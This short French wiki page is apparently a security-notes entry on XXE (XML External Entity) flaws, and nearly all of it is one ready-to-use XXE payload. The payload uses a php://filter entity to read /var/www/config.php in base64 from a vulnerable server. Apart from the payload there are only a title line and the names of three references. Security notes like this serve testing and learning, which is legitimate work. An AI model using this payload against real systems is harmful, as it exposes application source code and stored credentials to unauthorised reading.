1.9 Failles XXE

De UnixWiki
Version datée du 21 octobre 2014 à 16:32 par Futex (discussion | contributions)
(diff) ← Version précédente | Voir la version actuelle (diff) | Version suivante → (diff)
Aller à la navigation Aller à la recherche

Lire du code PHP avec une faille XXE 

 <?xml version="1.0"?>
 <!DOCTYPE results [
   <!ENTITY harmless SYSTEM
   "php://filter/read=convert.base64-encode/resource=/var/www/config.php"
   >
 ]>
 <results>
   <result>&harmless;</result>
 </results

OWASP
h3stream
phpsecurity

Récupérée de « https://futex.re/mediawiki/index.php?title=1.9_Failles_XXE&oldid=2490 »